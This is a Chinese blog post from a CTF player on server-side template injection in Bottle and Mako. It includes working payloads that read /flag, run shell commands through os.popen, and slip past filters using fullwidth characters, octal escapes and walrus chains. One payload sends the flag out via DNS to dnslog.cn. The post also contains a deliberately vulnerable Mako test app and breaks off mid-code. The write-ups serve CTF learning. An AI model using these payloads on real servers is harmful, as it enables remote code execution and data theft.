

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="https://gitee.com/bobrocket/img/raw/master/Snipaste_2025-12-30_21-02-15.png">
  <link rel="icon" href="https://gitee.com/bobrocket/img/raw/master/Snipaste_2025-12-30_21-02-15.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="suny">
  <meta name="keywords" content="">
  <meta name="referrer" content="no-referrer">
  
    <meta name="description" content="SSTI中经常涉及到jinja之外的模版，这里我们来总结一下各种模版都有什么特征以及如何利用 快速判断模版类型经典决策树通过决策树我们可以解决大部分情况下的模版判断  报错探测有时候题目会设置WAF，这就导致决策树可能走不通，这时候通过报错来探测模板类型就是一个好方法  Python模板引擎Bottle语法Bottle使用SimpleTemplate引擎或简称为 stpl，支持%语法。 Simpl">
<meta property="og:type" content="article">
<meta property="og:title" content="SSTI进阶——多种模版引擎特征及应用">
<meta property="og:url" content="https://www.sunynov.top/2026/06/30/%E5%A4%9A%E7%A7%8D%E6%A8%A1%E7%89%88%E5%BC%95%E6%93%8E%E7%89%B9%E5%BE%81%E5%8F%8A%E5%BA%94%E7%94%A8/index.html">
<meta property="og:site_name" content="suny">
<meta property="og:description" content="SSTI中经常涉及到jinja之外的模版，这里我们来总结一下各种模版都有什么特征以及如何利用 快速判断模版类型经典决策树通过决策树我们可以解决大部分情况下的模版判断  报错探测有时候题目会设置WAF，这就导致决策树可能走不通，这时候通过报错来探测模板类型就是一个好方法  Python模板引擎Bottle语法Bottle使用SimpleTemplate引擎或简称为 stpl，支持%语法。 Simpl">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://gitee.com/bobrocket/img/raw/master/114514.png">
<meta property="og:image" content="https://gitee.com/bobrocket/img/raw/master/image-20260701205707462.png">
<meta property="og:image" content="https://gitee.com/bobrocket/img/raw/master/image-20260701131333296.png">
<meta property="og:image" content="https://gitee.com/bobrocket/img/raw/master/image-20260701205357940.png">
<meta property="og:image" content="https://gitee.com/bobrocket/img/raw/master/image-20260701213655875.png">
<meta property="og:image" content="https://gitee.com/bobrocket/img/raw/master/image-20260701234155860.png">
<meta property="article:published_time" content="2026-06-30T15:26:48.000Z">
<meta property="article:modified_time" content="2026-07-01T16:05:40.146Z">
<meta property="article:author" content="suny">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://gitee.com/bobrocket/img/raw/master/114514.png">
  
  
  
  <title>SSTI进阶——多种模版引擎特征及应用 - suny</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"www.sunynov.top","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  



  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>suny</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/background.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="SSTI进阶——多种模版引擎特征及应用"></span>
          
        </div>

        
          
  <div class="mt-3">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-author" aria-hidden="true"></i>
        suny
      </span>
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2026-06-30 23:26" pubdate>
          2026年6月30日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          3.5k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          30 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">SSTI进阶——多种模版引擎特征及应用</h1>
            
              <p id="updated-time" class="note note-info" style="">
                
                  
                    本文最后更新于 2026年7月2日 凌晨
                  
                
              </p>
            
            
              <div class="markdown-body">
                
                <p>SSTI中经常涉及到jinja之外的模版，这里我们来总结一下各种模版都有什么特征以及如何利用</p>
<h1 id="快速判断模版类型"><a href="#快速判断模版类型" class="headerlink" title="快速判断模版类型"></a>快速判断模版类型</h1><h2 id="经典决策树"><a href="#经典决策树" class="headerlink" title="经典决策树"></a>经典决策树</h2><p>通过决策树我们可以解决大部分情况下的模版判断</p>
<p><img src="https://gitee.com/bobrocket/img/raw/master/114514.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="报错探测"><a href="#报错探测" class="headerlink" title="报错探测"></a>报错探测</h2><p>有时候题目会设置WAF，这就导致决策树可能走不通，这时候通过报错来探测模板类型就是一个好方法</p>
<p><img src="https://gitee.com/bobrocket/img/raw/master/image-20260701205707462.png" srcset="/img/loading.gif" lazyload alt="image-20260701205707462"></p>
<h1 id="Python模板引擎"><a href="#Python模板引擎" class="headerlink" title="Python模板引擎"></a>Python模板引擎</h1><h2 id="Bottle"><a href="#Bottle" class="headerlink" title="Bottle"></a>Bottle</h2><h3 id="语法"><a href="#语法" class="headerlink" title="语法"></a>语法</h3><p>Bottle使用SimpleTemplate引擎或简称为 <em>stpl</em>，支持<code>%</code>语法。</p>
<p>SimpleTemplate 支持 Python 表达式，也因此容易出现 SSTI。</p>
<ul>
<li>使用 <strong>类似 Python 的语法</strong>（表达式、方法、属性访问）。</li>
<li>支持 <strong>变量替换</strong>：<code>&#123;&#123; var &#125;&#125;</code>。</li>
<li>支持 <strong>控制结构</strong>（以 <code>%</code> 开头）：例如 <code>%if</code>、<code>%for</code>、<code>%while</code>（常用 <code>%if</code>、<code>%for</code>）。</li>
<li><strong>默认不提供严格的沙箱环境</strong> —— 即模板中通常可以执行 Python 表达式 &#x2F; 调用内建对象，存在 SSTI 风险。</li>
</ul>
<h3 id="特性"><a href="#特性" class="headerlink" title="特性"></a>特性</h3><p>支持斜体、全角、八进制，非常容易绕过WAF</p>
<p>这里有一个速查表 <a target="_blank" rel="noopener" href="https://www.compart.com/en/unicode/">Unicode - Compart</a></p>
<p><img src="https://gitee.com/bobrocket/img/raw/master/image-20260701131333296.png" srcset="/img/loading.gif" lazyload alt="image-20260701131333296"></p>
<h3 id="应用"><a href="#应用" class="headerlink" title="应用"></a>应用</h3><h4 id="ISCTF2025-难过的-bottle"><a href="#ISCTF2025-难过的-bottle" class="headerlink" title="[ISCTF2025]难过的 bottle"></a>[ISCTF2025]难过的 bottle</h4><p>题目源码中给出了WAF</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs python">BLACKLIST = [<span class="hljs-string">&quot;b&quot;</span>,<span class="hljs-string">&quot;c&quot;</span>,<span class="hljs-string">&quot;d&quot;</span>,<span class="hljs-string">&quot;e&quot;</span>,<span class="hljs-string">&quot;h&quot;</span>,<span class="hljs-string">&quot;i&quot;</span>,<span class="hljs-string">&quot;j&quot;</span>,<span class="hljs-string">&quot;k&quot;</span>,<span class="hljs-string">&quot;m&quot;</span>,<span class="hljs-string">&quot;n&quot;</span>,<span class="hljs-string">&quot;o&quot;</span>,<span class="hljs-string">&quot;p&quot;</span>,<span class="hljs-string">&quot;q&quot;</span>,<span class="hljs-string">&quot;r&quot;</span>,<span class="hljs-string">&quot;s&quot;</span>,<span class="hljs-string">&quot;t&quot;</span>,<span class="hljs-string">&quot;u&quot;</span>,<span class="hljs-string">&quot;v&quot;</span>,<span class="hljs-string">&quot;w&quot;</span>,<span class="hljs-string">&quot;x&quot;</span>,<span class="hljs-string">&quot;y&quot;</span>,<span class="hljs-string">&quot;z&quot;</span>,<span class="hljs-string">&quot;%&quot;</span>,<span class="hljs-string">&quot;;&quot;</span>,<span class="hljs-string">&quot;,&quot;</span>,<span class="hljs-string">&quot;&lt;&quot;</span>,<span class="hljs-string">&quot;&gt;&quot;</span>,<span class="hljs-string">&quot;:&quot;</span>,<span class="hljs-string">&quot;?&quot;</span>]<br> <span class="hljs-keyword">try</span>:<br>        <span class="hljs-keyword">return</span> template(content)<br>    <span class="hljs-keyword">except</span> Exception <span class="hljs-keyword">as</span> e:<br>        <span class="hljs-keyword">return</span> <span class="hljs-string">f&quot;渲染错误: <span class="hljs-subst">&#123;<span class="hljs-built_in">str</span>(e)&#125;</span>&quot;</span><br></code></pre></td></tr></table></figure>

<p>它对上传的文件解压后进行渲染，可以从这里注入</p>
<p>大部分字母全过滤了，刚好剩一个 flag，关键字用全角绕过</p>
<figure class="highlight handlebars"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs handlebars"><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">ｏｐｅｎ</span>(<span class="hljs-name">&#x27;/flag&#x27;</span>).ｒｅａｄ()&#125;&#125;</span><br></code></pre></td></tr></table></figure>

<p>也可以斜体绕过</p>
<p>补充——八进制绕过</p>
<figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs rust">&#123;&#123; __ｉｍｐｏｒｔ__(<span class="hljs-string">&#x27;<span class="hljs-char escape_">\1</span>57<span class="hljs-char escape_">\1</span>63&#x27;</span>).ｐｏｐｅｎ(<span class="hljs-string">&#x27;<span class="hljs-char escape_">\1</span>43<span class="hljs-char escape_">\1</span>41<span class="hljs-char escape_">\1</span>64<span class="hljs-char escape_">\0</span>40<span class="hljs-char escape_">\0</span>57<span class="hljs-char escape_">\1</span>46<span class="hljs-char escape_">\1</span>54<span class="hljs-char escape_">\1</span>41<span class="hljs-char escape_">\1</span>47&#x27;</span>).ｒｅａｄ() &#125;&#125;<br></code></pre></td></tr></table></figure>

<p>即:</p>
<figure class="highlight handlebars"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs handlebars"><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">__import__</span>(<span class="hljs-name">&#x27;os&#x27;</span>).popen(<span class="hljs-name">&#x27;cat /flag&#x27;</span>).read()&#125;&#125;</span><br></code></pre></td></tr></table></figure>

<h4 id="LilCTF2025-ez-bottle"><a href="#LilCTF2025-ez-bottle" class="headerlink" title="[LilCTF2025]ez_bottle"></a>[LilCTF2025]ez_bottle</h4><p>大致思路就是&#x2F;upload路由上传一个zip文件，然后bottle模版会渲染里面的文件</p>
<p>那么payload如何构造？bottle的waf还是比较好绕的</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs python">BLACK_DICT = [<span class="hljs-string">&quot;&#123;&quot;</span>, <span class="hljs-string">&quot;&#125;&quot;</span>, <span class="hljs-string">&quot;os&quot;</span>, <span class="hljs-string">&quot;eval&quot;</span>, <span class="hljs-string">&quot;exec&quot;</span>, <span class="hljs-string">&quot;sock&quot;</span>, <span class="hljs-string">&quot;&lt;&quot;</span>, <span class="hljs-string">&quot;&gt;&quot;</span>, <span class="hljs-string">&quot;bul&quot;</span>, <span class="hljs-string">&quot;class&quot;</span>, <span class="hljs-string">&quot;?&quot;</span>, <span class="hljs-string">&quot;:&quot;</span>, <span class="hljs-string">&quot;bash&quot;</span>, <span class="hljs-string">&quot;_&quot;</span>, <span class="hljs-string">&quot;globals&quot;</span>,<br>              <span class="hljs-string">&quot;get&quot;</span>, <span class="hljs-string">&quot;open&quot;</span>]<br></code></pre></td></tr></table></figure>

<p>这里使用经典的单行嵌入python代码</p>
<p>但是这个题没有回显，可以利用报错输出，也可以dnslog外带</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta prompt_">% </span><span class="language-bash">import ºs</span><br><span class="hljs-meta prompt_">% </span><span class="language-bash">flag=ºs.pºpen(<span class="hljs-string">&#x27;cat /flag&#x27;</span>).<span class="hljs-built_in">read</span>()</span><br><span class="hljs-meta prompt_">% </span><span class="language-bash">raise Exception(flag)</span><br><span class="hljs-meta prompt_">%</span><span class="language-bash">import pty</span><br><span class="hljs-meta prompt_">%</span><span class="language-bash">pty.spawn([<span class="hljs-string">&#x27;/bin/sh&#x27;</span>, <span class="hljs-string">&#x27;-c&#x27;</span>, <span class="hljs-string">&#x27;ping -c 1 `cat /flag|base64|tr -d &quot;\n&quot;`.abcdef.dnslog.cn&#x27;</span>])</span><br></code></pre></td></tr></table></figure>

<h4 id="VNCTF2025-学生姓名管理系统"><a href="#VNCTF2025-学生姓名管理系统" class="headerlink" title="[VNCTF2025]学生姓名管理系统"></a>[VNCTF2025]学生姓名管理系统</h4><p>放这个题目主要是和上面的单行嵌入python代码做一下区分以及介绍一下通过海象运算符绕过长度限制的手法</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># -*- encoding: utf-8 -*-</span><br><span class="hljs-string">&#x27;&#x27;&#x27;</span><br><span class="hljs-string">@File    :   app.py</span><br><span class="hljs-string">@Time    :   2025/03/29 15:52:17</span><br><span class="hljs-string">@Author  :   LamentXU </span><br><span class="hljs-string">&#x27;&#x27;&#x27;</span><br><span class="hljs-keyword">import</span> bottle<br><span class="hljs-string">&#x27;&#x27;&#x27;</span><br><span class="hljs-string">flag in /flag</span><br><span class="hljs-string">&#x27;&#x27;&#x27;</span><br><span class="hljs-meta">@bottle.route(<span class="hljs-params"><span class="hljs-string">&#x27;/&#x27;</span></span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">index</span>():<br>    <span class="hljs-keyword">return</span> <span class="hljs-string">&#x27;Hello, World!&#x27;</span><br><span class="hljs-meta">@bottle.route(<span class="hljs-params"><span class="hljs-string">&#x27;/attack&#x27;</span></span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">attack</span>():<br>    payload = bottle.request.query.get(<span class="hljs-string">&#x27;payload&#x27;</span>)<br>    <span class="hljs-keyword">if</span> payload <span class="hljs-keyword">and</span> <span class="hljs-built_in">len</span>(payload) &lt; <span class="hljs-number">5999</span> <span class="hljs-keyword">and</span> <span class="hljs-string">&#x27;open&#x27;</span> <span class="hljs-keyword">not</span> <span class="hljs-keyword">in</span> payload <span class="hljs-keyword">and</span> <span class="hljs-string">&#x27;\\&#x27;</span> <span class="hljs-keyword">not</span> <span class="hljs-keyword">in</span> payload:<br>        <span class="hljs-keyword">return</span> bottle.template(<span class="hljs-string">&#x27;hello &#x27;</span>+payload)<br>    <span class="hljs-keyword">else</span>:<br>        bottle.abort(<span class="hljs-number">400</span>, <span class="hljs-string">&#x27;Invalid payload&#x27;</span>)<br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&#x27;__main__&#x27;</span>:<br>    bottle.run(host=<span class="hljs-string">&#x27;0.0.0.0&#x27;</span>, port=<span class="hljs-number">5000</span>)<br></code></pre></td></tr></table></figure>

<p>如果 <code>&lt;% ... %&gt;</code> 或 <code>% ...</code> 嵌入在普通文本中（无换行符分隔），则被视为普通文本，直接输出。</p>
<p><code>bottle.template(&#39;hello &#39;+payload)</code>，这里是被嵌入在文本中的！！！</p>
<p>所以只能用<code>&#123;&#123; &#125;&#125;</code></p>
<p>这里有长度限制，可以通过海象运算符绕过</p>
<figure class="highlight handlebars"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs handlebars"><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">a:</span>=<span class="hljs-string">&#x27;&#x27;</span>&#125;&#125;</span><span class="language-xml">%0a</span><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">b:</span>=a.__class__&#125;&#125;</span><span class="language-xml">%0a</span><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">c:</span>=b.__base__&#125;&#125;</span><span class="language-xml">%0a</span><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">d:</span>=c.__subc</span><br><span class="hljs-template-variable">lasses__&#125;&#125;</span><span class="language-xml">%0a</span><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">e:</span>=d()[156]&#125;&#125;</span><span class="language-xml">%0a</span><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">f:</span>=e.__init__&#125;&#125;</span><span class="language-xml">%0a</span><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">g:</span>=f.__global</span><br><span class="hljs-template-variable">s__&#125;&#125;</span><span class="language-xml">%0a</span><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">z:</span>=<span class="hljs-string">&#x27;__builtins__&#x27;</span>&#125;&#125;</span><span class="language-xml">%0a</span><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">h:</span>=g[z]&#125;&#125;</span><span class="language-xml">%0a</span><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">i:</span>=h[&#x27;op&#x27;&#x27;en&#x27;]&#125;&#125;</span><span class="language-xml">%0</span><br><span class="language-xml">a</span><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">x:</span>=i(<span class="hljs-name">&quot;/flag&quot;</span>)&#125;&#125;</span><span class="language-xml">%0a</span><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">y:</span>=x.read()&#125;&#125;</span><span class="language-xml"> </span><br></code></pre></td></tr></table></figure>



<h2 id="Mako"><a href="#Mako" class="headerlink" title="Mako"></a>Mako</h2><h3 id="语法-1"><a href="#语法-1" class="headerlink" title="语法"></a>语法</h3><ul>
<li>使用 <strong>类似 Python 的语法</strong>（表达式、方法、属性访问）。</li>
<li>支持 <strong>变量替换</strong>：<code>$&#123; var &#125;</code>。</li>
<li>支持 <strong>控制结构</strong>（以 <code>%</code> 开头）：例如 <code>%if</code>、<code>%for</code>、<code>%while</code>（常用 <code>%if</code>、<code>%for</code>）。</li>
<li><strong>默认不提供严格的沙箱环境</strong> —— 即模板中通常可以执行 Python 表达式 &#x2F; 调用内建对象，存在 SSTI 风险。</li>
</ul>
<p>这里需要注意的一点是Mako不支持%单行python代码，只能使用python代码块</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-section">&lt;%  %&gt;</span><br></code></pre></td></tr></table></figure>

<h3 id="特性-1"><a href="#特性-1" class="headerlink" title="特性"></a>特性</h3><p>支持Unicode字符</p>
<h3 id="用法"><a href="#用法" class="headerlink" title="用法"></a>用法</h3><p>网上可以找到的关于Mako SSTI的资料比较少，这里我用ai写了一个Mako复读机供测试使用</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> flask <span class="hljs-keyword">import</span> Flask, request, render_template_string<br><span class="hljs-keyword">from</span> mako.template <span class="hljs-keyword">import</span> Template<br><span class="hljs-keyword">import</span> logging<br><br>app = Flask(__name__)<br><br><span class="hljs-comment"># 关闭一些不必要的日志，保持后台干净</span><br>log = logging.getLogger(<span class="hljs-string">&#x27;werkzeug&#x27;</span>)<br>log.setLevel(logging.ERROR)<br><br><span class="hljs-comment"># 基础的 HTML 表单模板（已将 input 改为 textarea）</span><br>HTML_TEMPLATE = <span class="hljs-string">&quot;&quot;&quot;</span><br><span class="hljs-string">&lt;!DOCTYPE html&gt;</span><br><span class="hljs-string">&lt;html&gt;</span><br><span class="hljs-string">&lt;head&gt;</span><br><span class="hljs-string">    &lt;title&gt;Mako SSTI Test Lab (Multi-line)&lt;/title&gt;</span><br><span class="hljs-string">    &lt;style&gt;</span><br><span class="hljs-string">        body &#123; font-family: Arial, sans-serif; margin: 40px; background-color: #f4f4f9; &#125;</span><br><span class="hljs-string">        .container &#123; max-width: 700px; margin: 0 auto; background: white; padding: 30px; border-radius: 8px; box-shadow: 0 4px 6px rgba(0,0,0,0.1); &#125;</span><br><span class="hljs-string">        textarea &#123; width: 100%; height: 120px; padding: 10px; box-sizing: border-box; border: 1px solid #ccc; border-radius: 4px; resize: vertical; font-family: monospace; &#125;</span><br><span class="hljs-string">        .btn-container &#123; margin-top: 10px; text-align: right; &#125;</span><br><span class="hljs-string">        input[type=&quot;submit&quot;] &#123; padding: 10px 20px; border: none; background-color: #007BFF; color: white; border-radius: 4px; cursor: pointer; font-size: 14px; &#125;</span><br><span class="hljs-string">        input[type=&quot;submit&quot;]:hover &#123; background-color: #0056b3; &#125;</span><br><span class="hljs-string">        .result &#123; margin-top: 20px; padding: 15px; background-color: #e9ecef; border-left: 5px solid #28a745; border-radius: 4px; white-space: pre-wrap; word-break: break-all; font-family: monospace; &#125;</span><br><span class="hljs-string">    &lt;/style&gt;</span><br><span class="hljs-string">&lt;/head&gt;</span><br><span class="hljs-string">&lt;body&gt;</span><br><span class="hljs-string">    &lt;div class=&quot;container&quot;&gt;</span><br><span class="hljs-string">        &lt;h2&gt;Mako 模板多行复读机 (SSTI 测试)&lt;/h2&gt;</span><br><span class="hljs-string">        &lt;form method=&quot;POST&quot; action=&quot;/&quot;&gt;</span><br><span class="hljs-string">            &lt;textarea name=&quot;code&quot; placeholder=&quot;在此输入 Mako 模板内容...&amp;#10;例如: $&#123;7*7&#125;&quot;&gt;&lt;/textarea&gt;</span><br><span class="hljs-string">            &lt;div class=&quot;btn-container&quot;&gt;</span><br><span class="hljs-string">                &lt;input type=&quot;submit&quot; value=&quot;渲染模板&quot;&gt;</span><br><span class="hljs-string">            &lt;/div&gt;</span><br><span class="hljs-string">        &lt;/form&gt;</span><br><span class="hljs-string">        </span><br><span class="hljs-string">        &#123;% if result %&#125;</span><br><span class="hljs-string">        &lt;div class=&quot;result&quot;&gt;</span><br><span class="hljs-string">            &lt;strong&gt;渲染结果：&lt;/strong&gt;&lt;br&gt;&#123;&#123; result | safe &#125;&#125;</span><br><span class="hljs-string">        &lt;/div&gt;</span><br><span class="hljs-string">        &#123;% endif %&#125;</span><br><span class="hljs-string">    &lt;/div&gt;</span><br><span class="hljs-string">&lt;/body&gt;</span><br><span class="hljs-string">&lt;/html&gt;</span><br><span class="hljs-string">&quot;&quot;&quot;</span><br><br><span class="hljs-comment"># 改为 POST 请求，方便传输多行大数据</span><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&#x27;/&#x27;</span>, methods=[<span class="hljs-string">&#x27;GET&#x27;</span>, <span class="hljs-string">&#x27;POST&#x27;</span>]</span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">index</span>():<br>    result = <span class="hljs-string">&#x27;&#x27;</span><br>    <span class="hljs-keyword">if</span> request.method == <span class="hljs-string">&#x27;POST&#x27;</span>:<br>        user_input = request.form.get(<span class="hljs-string">&#x27;code&#x27;</span>, <span class="hljs-string">&#x27;&#x27;</span>)<br>        <span class="hljs-keyword">if</span> user_input:<br>            <span class="hljs-keyword">try</span>:<br>                <span class="hljs-comment"># 